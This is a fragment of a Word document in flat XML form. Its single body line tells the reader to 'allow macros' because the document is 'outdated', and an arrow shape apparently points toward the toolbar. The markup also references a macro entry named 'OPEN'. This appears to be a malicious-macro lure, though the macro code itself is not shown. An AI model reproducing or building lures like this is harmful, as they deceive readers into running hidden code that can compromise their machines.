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65E32" w:rsidRDefault="00205DDF" w:rsidP="00465E32">
      <w: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margin-left:53.65pt;margin-top:-60.35pt;width:252.3pt;height:62.35pt;flip:x y;z-index:251658240" o:connectortype="straight" strokeweight="1.75pt">
            <v:stroke endarrow="block"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00E26947">
        <w:t>Please allow macros on the botton of the toolbar. You will need addition privilegies this word doc because your word document is outdated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005459D4" w:rsidRDefault="005459D4"/>
    <w:sectPr w:rsidR="005459D4" w:rsidSect="005459D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defaultTabStop w:val="708"/>
  <w:hyphenationZone w:val="425"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:compat/>
  <w:rsids>
    <w:rsidRoot w:val="001E7E97"/>
    <w:rsid w:val="001A03AD"/>
    <w:rsid w:val="001E7E97"/>
    <w:rsid w:val="00205DDF"/>
    <w:rsid w:val="00465E32"/>
    <w:rsid w:val="005459D4"/>
    <w:rsid w:val="005D6FDF"/>
    <w:rsid w:val="00706685"/>
    <w:rsid w:val="00D06848"/>
    <w:rsid w:val="00E2694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  <o:rules v:ext="edit">
        <o:r id="V:Rule2" type="connector" idref="#_x0000_s1026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465E32"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OPEN" wne:name="Project.NewMacros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17873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21</Words>
  <Characters>120</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>140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ntb</dc:creator>
  <cp:lastModifiedBy>ntb</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-03T19:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-08T13:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>